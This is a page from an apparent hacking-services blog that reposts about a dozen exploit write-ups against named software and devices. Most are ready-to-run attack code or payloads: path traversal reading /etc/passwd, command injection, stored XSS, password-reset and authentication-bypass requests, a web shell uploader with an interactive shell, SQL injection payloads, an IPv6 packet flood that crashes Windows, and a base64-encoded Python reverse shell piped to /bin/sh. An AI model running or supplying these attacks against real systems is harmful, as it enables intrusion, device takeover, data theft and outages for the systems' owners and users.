Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863106758

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter
# Google Dork: N/A
# Date: 2024-06-29
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/X)
# Vendor Homepage: https://devikaai.co/
# Software Link: https://github.com/stitionai/devika
# Version: v1
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-40422

#!/usr/bin/python

import argparse
import requests

def exploit(target_url):
    url = f'http://{target_url}/api/get-browser-snapshot'
    params = {
        'snapshot_path': '../../../../etc/passwd'
    }

    response = requests.get(url, params=params)
    print(response.text)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')
    parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)
    args = parser.parse_args()

    exploit(args.target)
HireHackking 
#Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2024-07-31
#Vendor : Genexus
#Version : Genexus Protection Server 9.7.2.10
#Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;
#Vendor Homepage :  https://www.genexus.com/es/
#Tested on OS: Windows 10 Pro

#Analyze PoC :
==============

C:\>sc qc protsrvservice
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: protsrvservice
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files
(x86)\CommonFiles\Artech\GXProt1\ProtSrv.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : ProtSrvService
        DEPENDENCIAS       : RPCSS
        NOMBRE_INICIO_SERVICIO: LocalSystem
HireHackking 
# Exploit Title: Remote Command Execution | Aurba 501
# Date: 17-07-2024
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.hpe.com
# Version: Aurba 501 CN12G5W0XX
# Tested on: Linux

import requests
from requests.auth import HTTPBasicAuth


def get_input(prompt, default_value):
    user_input = input(prompt)
    return user_input if user_input else default_value


base_url = input("Enter the base URL: ")
if not base_url:
    print("Base URL is required.")
    exit(1)

username = get_input("Enter the username (default: admin): ", "admin")
password = get_input("Enter the password (default: admin): ", "admin")


login_url = f"{base_url}/login.cgi"
login_payload = {
    "username": username,
    "password": password,
    "login": "Login"
}


login_headers = {
    "Accept-Encoding": "gzip, deflate, br",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": base_url,
    "Connection": "close"
}

session = requests.Session()


requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

# Login to the system
response = session.post(login_url, headers=login_headers, data=login_payload, verify=False)

# Check if login was successful
if response.status_code == 200 and "login failed" not in response.text.lower():
    print("Login successful!")
    
    # The command to be executed on the device
    command = "cat /etc/passwd"
    
    
    ping_ip = f"4.2.2.4||{command}"
    
    # Data to be sent in the POST request
    data = {
        "ping_ip": ping_ip,
        "ping_timeout": "1",
        "textareai": "",
        "ping_start": "Ping"
    }
    
    # Headers to be sent with the request
    headers = {
        "Accept-Encoding": "gzip, deflate, br",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": base_url,
        "Referer": f"{base_url}/admin.cgi?action=ping",
        "Connection": "close"
    }
    
    # Sending the HTTP POST request to exploit the vulnerability
    exploit_url = f"{base_url}/admin.cgi?action=ping"
    response = session.post(exploit_url, headers=headers, data=data, verify=False)
    
    
    if any("root" in value for value in response.headers.values()):
        print("Exploit successful! The /etc/passwd file contents are reflected in the headers:")
        print(response.headers)
    else:
        print("Exploit failed. The response headers did not contain the expected output.")
else:
    print("Login failed. Please check the credentials and try again.")

# Print the response headers for further analysis
print(response.headers)
HireHackking 
# Exploit Title: Stored XSS Vulnerability via File Name
# Google Dork: N/A
# Date: 08 Aug 2024
# Exploit Author: Md. Sadikul Islam
# Vendor Homepage: https://www.helpdeskz.com/
# Software Link:
https://github.com/helpdesk-z/helpdeskz-dev/archive/2.0.2.zip
# Version: v2.0.2
# Tested on: Kali Linux /  Firefox 115.1.0esr (64-bit)
# CVE : N/A

Payload: "><img src=x onerror=alert(1);>
Filename can be Payload: "><img src=x onerror=alert(1);>.jpg

VIdeo PoC:
https://drive.google.com/file/d/1_yh0UsX8h7YcSU1kFvg_bBwk9T7kx1K1/view?usp=drive_link

Steps to Reproduce:
    1. Log in as a regular user and create a new ticket.
    2. Fill out all the required fields with the necessary information.
    3. Attach an image file with a malicious payload embedded in the
filename.
    4. Submit the ticket.
    5. Access the ticket from the administration panel to trigger the
payload execution.

Cross-Site Scripting (XSS) exploits can compromise the administration
panel, directly affecting administrators by allowing malicious scripts to
execute within their privileged environment.
HireHackking
Elber Wayber Analog/Digital Audio STL 4.00 Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342) Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131) Summary: Wayber II is the name of an analogue/digital microwave link able to transport a Mono or a MPX stereo signal from studio to audio transmitter. Compact and reliable, it features very high quality and modern technology both in signal processing and microwave section leading to outstanding performances. Desc: The device suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint that enables them to overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application compromising the device's system security. -------------------------------------------------------------------------- /modules/pwd.html ------------------ 50: function apply_pwd(level, pwd) 51: { 52: $.get("json_data/set_pwd", {lev:level, pass:pwd}, 53: function(data){ 54: //$.alert({title:'Operation',text:data}); 55: show_message(data); 56: }).fail(function(error){ 57: show_message('Error ' + error.status, 'error'); 58: }); 59: } -------------------------------------------------------------------------- Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5822 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5822.php 18.08.2023 -- $ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234 Ref (lev param): Level 7 = SNMP Write Community (snmp_write_pwd) Level 6 = SNMP Read Community (snmp_read_pwd) Level 5 = Custom Password? hidden. (custom_pwd) Level 4 = Display Password (display_pwd)? Level 2 = Administrator Password (admin_pwd) Level 1 = Super User Password (puser_pwd) Level 0 = User Password (user_pwd)
HireHackking

Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Device Config

HACKER · %s · %s

Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.5.179 Revision 904 1.5.56 Revision 884 1.229 Revision 440 Summary: ESE (Elber Satellite Equipment) product line, designed for the high-end radio contribution and distribution market, where quality and reliability are most important. The Elber IRD (Integrated Receiver Decoder) ESE-01 offers a professional audio quality (and composite video) at an excellent quality/price ratio. The development of digital satellite contribution networks and the need to connect a large number of sites require a cheap but reliable and performing satellite receiver with integrated decoder. Desc: The device suffers from an unauthenticated device configuration and client-side hidden functionality disclosure. Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5821 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5821.php 18.08.2023 -- # Config fan $ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=' Configuration applied # Delete config $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2' File delete successfully # Launch upgrade $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1' Upgrade launched Successfully # Log erase $ curl 'http://TARGET/json_data/erase_log.js?until=-2' Logs erased # Until: # =0 ALL # =-2 Yesterday # =-8 Last week # =-15 Last two weeks # =-22 Last three weeks # =-31 Last month # Set RX config $ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0' RX Config Applied Successfully # Show factory window and FPGA upload (Console) > cleber_show_factory_wnd() # Etc.
HireHackking

HughesNet HT2000W Satellite Modem - Password Reset

HACKER · %s · %s

# Exploit Title: HughesNet HT2000W Satellite Modem (Arcadyan httpd 1.0) - Password Reset # Date: 7/16/24 # Exploit Author: Simon Greenblatt <simongreenblatt[at]protonmail.com> # Vendor: HughesNet # Version: Arcadyan httpd 1.0 # Tested on: Linux # CVE: CVE-2021-20090 import sys import requests import re import base64 import hashlib import urllib red = "\033[0;41m" green = "\033[1;34;42m" reset = "\033[0m" def print_banner(): print(green + ''' _____________ _______________ _______________ ________ ____ _______________ _______ _______________ \_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \/_ | \_____ \ _ \ \ _ \/ __ \ _ \ / \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ | | ______ / ____/ /_\ \/ /_\ \____ / /_\ \ \ \____\ / | \ /_____/ / \ \_/ \/ \ | | /_____/ / \ \_/ \ \_/ \ / /\ \_/ \ \______ / \___/ /_______ / \_______ \_____ /\_______ \|___| \_______ \_____ /\_____ //____/ \_____ / \/ \/ \/ \/ \/ \/ \/ \/ \/ \n''' + reset) print(" Administrator password reset for HughesNet HT2000W Satellite Modem") print(''' Usage: python3 hughes_ht2000w_pass_reset.py <password> <ip_address> <password>: The new administrator password <ip_address>: The IP address of the web portal. If none is provided, the script will default to 192.168.42.1\n This script takes advantage of CVE-2021-20090, a path traversal vulnerability in the HTTP daemon of the HT2000W modem to reset the administrator password of the configuration portal. It also takes advantage of other vulnerabilities in the device such as improper use of httokens for authentication and the portal allowing the MD5 hash of the password to be leaked.''') return None def get_httoken(ip_address): # Make a GET request to system_p.htm using path traversal r = requests.get(f'http://{ip_address}/images/..%2fsystem_p.htm') if r.status_code != 200: print(red + f"(-) Failure: Could not request system_p.htm" + reset) exit() # Extract the httoken hidden in the DOM and convert it from Base64 return base64.b64decode(re.search(r'AAAIBRAA7(.*?)"', r.text).group(1)).decode('ascii') def encode_pass(password): # Vigenere Cipher key = "wg7005d" enc_pass = "" idx = 0 for c in password: enc_pass += str(ord(c) + ord(key[idx])) + "+" idx = (idx + 1) % len(key) return enc_pass def change_pass(ip_address, httoken, enc_pass): # Create a POST request with the httoken and the encoded password headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': f'http://{ip_address}/system_p.htm'} payload = {'action': 'ui_system_p', 'httoken': httoken, 'submit_button': 'system_p.htm', 'ARC_SYS_Password': enc_pass} payload = urllib.parse.urlencode(payload, safe=':+') try: r = requests.post(f'http://{ip_address}/images/..%2fapply_abstract.cgi', data = payload, headers = headers) except: pass return None def verify_pass(ip_address, new_pass): # Make a GET request to cgi_sys_p.js to verify password httoken = get_httoken(ip_address) headers = {'Referer': f'http://{ip_address}/system_p.htm'} r = requests.get(f'http://{ip_address}/images/..%2fcgi/cgi_sys_p.js?_tn={httoken}', headers = headers) if r.text.split('"')[5] != hashlib.md5(bytes(new_pass, 'ascii')).hexdigest(): print(red + "(-) Failure: Could not verify the hash of the password" + reset) exit() def main(): if not (len(sys.argv) == 2 or len(sys.argv) == 3): print_banner() return new_pass = sys.argv[1] ip_address = "192.168.42.1" if sys.argv == 3: ip_address = sys.argv[2] httoken = get_httoken(ip_address) print(f"[+] Obtained httoken: {httoken}") enc_pass = encode_pass(new_pass) change_pass(ip_address, httoken, enc_pass) print(f"[+] Password reset to: {new_pass}") verify_pass(ip_address, new_pass) print("[+] Verified password hash: " + hashlib.md5(bytes(new_pass, 'ascii')).hexdigest()) print("[+] Password successfully changed!") return if __name__ == '__main__': main()
HireHackking

Windows TCP/IP - RCE Checker and Denial of Service

HACKER · %s · %s

#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Exploit Title: Windows IPv6 CVE-2024-38063 Checker and Denial-Of-Service # Date: 2024-08-07 # Exploit Author: Photubias # Vendor Homepage: https://microsoft.com # Vendor Advisory: [1] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063 # Version: Windows 10, 11 <10.0.26100.1457 and Server 2016-2019-2022 <10.0.17763.6189 # Tested on: Windows 11 23H2 and Windows Server 2022 # CVE: CVE-2024-38063 import os, subprocess, re, time, sys ## Variables sDstIP = 'fe80::78b7:6283:49ad:c565' ## Placeholder if len(sys.argv) > 1: sDstIP = sys.argv[1] ## Please provide an argument sDstMAC = '00:0C:29:55:E1:C8' ## Not required, will try to get the MAC via Neighbor Discovery iBatches = 20 iCorruptions = 20 ## How many times do we want to corrupt the tcpip.sys memory per batch try: print('--- Loading Scapy, might take some time ...') from scapy.config import conf conf.ipv6_enabled = False import scapy.all as scapy scapy.conf.verb = 0 except: print('Error while loading scapy, please run "pip install scapy"') exit(1) import logging logging.getLogger('scapy.runtime').setLevel(logging.ERROR) def selectInterface(): #adapter[] = npfdevice, ip, mac def getAllInterfaces(): lstInterfaces=[] if os.name == 'nt': proc = subprocess.Popen('getmac /NH /V /FO csv | FINDSTR /V /I disconnected', shell=True, stdout=subprocess.PIPE) for bInterface in proc.stdout.readlines(): lstInt = bInterface.split(b',') sAdapter = lstInt[0].strip(b'"').decode() sDevicename = lstInt[1].strip(b'"').decode() sMAC = lstInt[2].strip(b'"').decode().lower().replace('-', ':') sWinguID = lstInt[3].strip().strip(b'"').decode()[-38:] proc = subprocess.Popen('netsh int ipv6 show addr "{}" | FINDSTR /I Address'.format(sAdapter), shell=True, stdout=subprocess.PIPE) try: sIP = re.findall(r'[\w:]+:+[\w:]+', proc.stdout.readlines()[0].strip().decode())[0] except: sIP = '' if len(sMAC) == 17: lstInterfaces.append([sAdapter, sIP, sMAC, sDevicename, sWinguID]) # When no or bad MAC address (e.g. PPP adapter), do not add else: proc = subprocess.Popen('for i in $(ip address | grep -v "lo" | grep "default" | cut -d":" -f2 | cut -d" " -f2);do echo $i $(ip address show dev $i | grep "inet6 " | cut -d" " -f6 | cut -d"/" -f1) $(ip address show dev $i | grep "ether" | cut -d" " -f6);done', shell=True, stdout=subprocess.PIPE) for bInterface in proc.stdout.readlines(): lstInt = bInterface.strip().split(b' ') try: if len(lstInt[2]) == 17: lstInterfaces.append([lstInt[0].decode(), lstInt[1].decode(), lstInt[2].decode(), '', '']) except: pass return lstInterfaces lstInterfaces = getAllInterfaces() if len(lstInterfaces) > 1: i = 1 for lstInt in lstInterfaces: #array of arrays: adapter, ip, mac, windows devicename, windows guID print('[{}] {} has {} ({})'.format(i, lstInt[2], lstInt[1], lstInt[0])) i += 1 #sAnswer = input('[?] Please select the adapter [1]: ') sAnswer='3' else: sAnswer = None if not sAnswer or sAnswer == '' or not sAnswer.isdigit() or int(sAnswer) >= i: sAnswer = 1 iAnswer = int(sAnswer) - 1 sNPF = lstInterfaces[iAnswer][0] sIP = lstInterfaces[iAnswer][1] sMAC = lstInterfaces[iAnswer][2] if os.name == 'nt': sNPF = r'\Device\NPF_' + lstInterfaces[iAnswer][4] return (sNPF, sIP, sMAC, lstInterfaces[iAnswer][3]) def get_packets(iID, sDstIPv6, sDstMac=None): iFragID = 0xbedead00 + iID oPacket1 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrDestOpt(options=[scapy.PadN(otype=0x81, optdata='bad')]) oPacket2 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 1, offset = 0) / 'notalive' oPacket3 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 0, offset = 1) if sDstMac: ## Should always be this, it seems sending to 'ff:ff:ff:ff:ff:ff' does not work oPacket1 = scapy.Ether(dst=sDstMac) / oPacket1 oPacket2 = scapy.Ether(dst=sDstMac) / oPacket2 oPacket3 = scapy.Ether(dst=sDstMac) / oPacket3 return [oPacket1, oPacket2, oPacket3] def doIPv6ND(sDstIP, sInt): ## Try to get a MAC address via IPv6 Neighbour Sollicitation sMACResp = None oNeighborSollicitation = scapy.IPv6(dst=sDstIP) / scapy.ICMPv6ND_NS(tgt=sDstIP) / scapy.ICMPv6NDOptSrcLLAddr(lladdr='ff:ff:ff:ff:ff:ff') oResponse = scapy.sr1(oNeighborSollicitation, timeout=5, iface=sInt) if oResponse and scapy.ICMPv6NDOptDstLLAddr in oResponse: sMACResp = oResponse[scapy.ICMPv6NDOptDstLLAddr].lladdr return sMACResp lstInt = selectInterface() ## NPF, IPv6, MAC, Name sMAC = doIPv6ND(sDstIP, lstInt[0]) if sMAC: print(f'[+] Target {sDstIP} is reachable, got MAC Address {sMAC}') sDstMAC = sMAC elif sDstMAC != '': print('[-] Target not responding to Neighbor Sollicitation Packets, using the provided MAC {}'.format(sDstMAC)) else: print('[-] Without a MAC address, this exploit will probably not work') lstPacketsToSend = [] for i in range(iBatches): for j in range(iCorruptions): lstPacketsToSend += get_packets(j, sDstIP, sDstMAC) + get_packets(j, sDstIP, sDstMAC) ## 'send' is Layer3 (let scapy figure out the MAC address), 'sendp' is L2 (MAC address is filled in, much better) print('[i] Verifying vulnerability against IPv6 address {}'.format(sDstIP)) ## Verification first: "ICMPv6ParamProblem" lstResp = scapy.srp1(lstPacketsToSend[0], iface=lstInt[0], timeout=5) if lstResp and scapy.IPv6 in lstResp[0] and scapy.ICMPv6ParamProblem in lstResp[0]: print('[+] Yes, {} is vulnerable and exploitable for CVE-2024-38063'.format(sDstIP)) else: input('[-] Not vulnerable or firewall is enabled. Please verify and rerun or press enter to continue') print('[i] Waiting 10 seconds to let the target cool down (more is better)') time.sleep(10) input('[?] OK, continue to execute the Denial Of Service (BSOD)? Press Ctrl+C to cancel now') ########## Exploit print('[+] Sending {} packets now via interface {} {}'.format(len(lstPacketsToSend), lstInt[0], lstInt[3])) scapy.conf.verb = 1 scapy.sendp(lstPacketsToSend, iface=lstInt[0]) print('[+] All packets are sent, now it takes *exactly* 60 seconds for the target to crash')
HireHackking
# Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) # Date: 6th October, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Version: 1.52.01 # Tested on: Ubuntu import argparse import requests import random import string import urllib.parse def command_shell(exploit_url): commands = input("soplaning:~$ ") encoded_command = urllib.parse.quote_plus(commands) command_res = requests.get(f"{exploit_url}?cmd={encoded_command}") if command_res.status_code == 200: print(f"{command_res.text}") return print(f"Error: An erros occured while running command: {encoded_command}") def exploit(username, password, url): target_url = f"{url}/process/login.php" upload_url = f"{url}/process/upload.php" link_id = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6)) php_filename = f"{''.join(random.choices(string.ascii_lowercase + string.digits, k=3))}.php" login_data = {"login":username,"password":password} res = requests.post(target_url, data=login_data, allow_redirects=False) cookies = res.cookies multipart_form_data = { "linkid": link_id, "periodeid": 0, "fichiers": php_filename, "type": "upload" } web_shell = "<?php system($_GET['cmd']); ?>" files = { 'fichier-0': (php_filename, web_shell, 'application/x-php') } upload_res = requests.post(upload_url, cookies=cookies,files=files, data=multipart_form_data) if upload_res.status_code == 200 and "File" in upload_res.text: print(f"[+] Uploaded ===> {upload_res.text}") print("[+] Exploit completed.") exploit_url = f"{url}/upload/files/{link_id}/{php_filename}" print(f"Access webshell here: {exploit_url}?cmd=<command>") if "yes" == input("Do you want an interactive shell? (yes/no) "): try: while True: command_shell(exploit_url) except Exception as e: raise(f"Error: {e}") else: pass def main(): parser = argparse.ArgumentParser(prog="SOplanning RCE", \ usage=f"python3 {__file__.split('/')[-1]} -t http://example.com:9090 -u admin -p admin") parser.add_argument("-t", "--target", type=str, help="Target URL (e.g., http://localhost:8080)", required=True) parser.add_argument("-u", "--username",type=str,help="username", required=True) parser.add_argument("-p", "--password",type=str,help="password", required=True) args = parser.parse_args() exploit(args.username, args.password, args.target) main()
HireHackking

openSIS 9.1 - SQLi (Authenticated)

HACKER · %s · %s

# Exploit Title: openSIS 9.1 - SQLi (Authenticated) # Google Dork: intext:"openSIS is a product" # Date: 09.09.2024 # Exploit Author: Devrim Dıragumandan (d0ub1edd) # Vendor Homepage: https://www.os4ed.com/ # Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1 # Version: 9.1 # Tested on: Linux A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php. GET /Ajax.php?modname=x HTTP/1.1 --- Parameter: X-Forwarded-For #1* ((custom) HEADER) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae --- FIX: https://github.com/OS4ED/openSIS-Classic/pull/322
HireHackking

reNgine 2.2.0 - Command Injection (Authenticated)

HACKER · %s · %s

# Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated) # Date: 2024-09-29 # Exploit Author: Caner Tercan # Vendor Homepage: https://rengine.wiki/ # Software Link: https://github.com/yogeshojha/rengine # Version: v2.2.0 # Tested on: macOS POC : 1. Login the Rengine Platform 2. Click the Scan Engine 3. Modify any Scan Engine 4. I modified nmap_cmd parameters on yml config 5. Finally, add a target in the targets section, select the scan engine you edited and start scanning. payload : 'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh #’
HireHackking

ABB Cylon Aspect 3.07.02 - File Disclosure

HACKER · %s · %s

# Exploit Title : ABB Cylon Aspect 3.07.02 - File Disclosure Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.07.02 Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices. Desc: The building management system suffers from an authenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'downloadDb.php' script is not properly verified before being used to download database files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks. Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5831 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5831.php 21.04.2024 -- $ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl "http://192.168.73.31/downloadDb.php?file=../../../../../../../../etc/passwd" \ > -H "Cookie: PHPSESSID=xxx" root:x:0:0:root:/home/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh messagebus:x:999:998::/var/lib/dbus:/bin/false systemd-journal-gateway:x:998:995::/home/systemd-journal-gateway: avahi:x:997:994::/var/run/avahi-daemon:/bin/false avahi-autoipd:x:996:993:Avahi autoip daemon:/var/run/avahi-autoipd:/bin/false sshd:x:995:992::/var/run/sshd:/bin/false xuser:x:1000:1000::/home/xuser: ppp:x:994:65534::/dev/null:/usr/sbin/ppp-dialin mysql:x:993:65534::/var/mysql: aamtech:x:500:500::/home/aamtech:/bin/sh
HireHackking

Nagios Log Server 2024R1.3.1 - Stored XSS

HACKER · %s · %s

